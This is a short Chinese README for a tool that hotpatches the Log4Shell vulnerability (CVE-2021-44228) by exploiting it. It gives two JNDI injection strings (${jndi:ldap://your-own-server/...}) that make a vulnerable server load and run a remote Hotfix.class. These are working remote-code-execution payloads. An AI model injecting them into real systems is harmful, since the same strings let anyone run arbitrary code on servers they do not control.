通过利用漏洞本身热修补CVE-2021-44228。
将以下代码注入到可能受CVE-2021-44228影响的任何位置,
${jndi:ldap://your-own-server/patch}
为防止修补过程中的中间人攻击(MITM),建议使用以下payload,但对于旧版Java兼容性较差,
${jndi:ldap://your-own-server/any_string_except_patch}
下载最新的发行版
如果你想在自己的服务器上托管Hotfix.class,请指定系统环境变量LOG4J_HOTFIX_HTTP_PATH和LOG4J_HOTFIX_HTTPS_PATH
请注意,Hotfix.java应使用JDK6编译以获得最大兼容性。